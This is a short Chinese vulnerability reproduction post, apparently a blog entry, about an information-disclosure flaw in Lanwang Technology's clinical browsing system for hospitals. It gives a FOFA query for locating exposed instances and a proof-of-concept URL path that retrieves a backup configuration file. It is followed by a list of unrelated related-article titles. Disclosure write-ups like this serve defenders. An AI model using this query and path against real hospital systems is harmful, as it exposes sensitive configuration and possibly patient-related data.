【漏洞复现】蓝网科技临床浏览系统信息泄露漏洞

Nx01 产品简介

蓝网科技临床浏览系统是一个专门用于医疗行业的软件系统,主要用于医生、护士和其他医疗专业人员在临床工作中进行信息浏览、查询和管理。

Nx02 漏洞描述

蓝网科技临床浏览系统存在信息泄露漏洞,攻击者可以利用该漏洞获取敏感信息。

Nx03 产品主页

fofa-query: title=="临床浏览"

Nx04 漏洞复现

POC:

/config/config%20bak.txt

Nx05 修复建议

建议联系软件厂商进行处理。

相关推荐
永乐春秋4 分钟前
WEB攻防-JavaWweb项目&JWT身份攻击&组件安全&访问控制
安全
danplus4 分钟前
node发送邮件:如何实现Node.js发信功能?
服务器·node.js·外贸开发信·邮件群发·蜂邮edm邮件营销·邮件接口·营销邮件
petaexpress11 分钟前
常用的k8s容器网络模式有哪些?
网络·容器·kubernetes
小黑爱编程12 分钟前
【LInux】HTTPS是如何实现安全传输的
linux·安全·https
BeyondESH17 分钟前
Linux线程同步—竞态条件和互斥锁(C语言)
linux·服务器·c++
wn53119 分钟前
【Go - 类型断言】
服务器·开发语言·后端·golang
hanniuniu1320 分钟前
详细解读,F5服务器负载均衡的技术优势
运维·服务器·负载均衡
PatrickYao04221 小时前
记一次安装discuz时遇到的错误
服务器
云卓科技1 小时前
无人机之控制距离篇
科技·安全·机器人·无人机·制造
云卓科技1 小时前
无人机之飞行高度篇
科技·安全·机器人·无人机·制造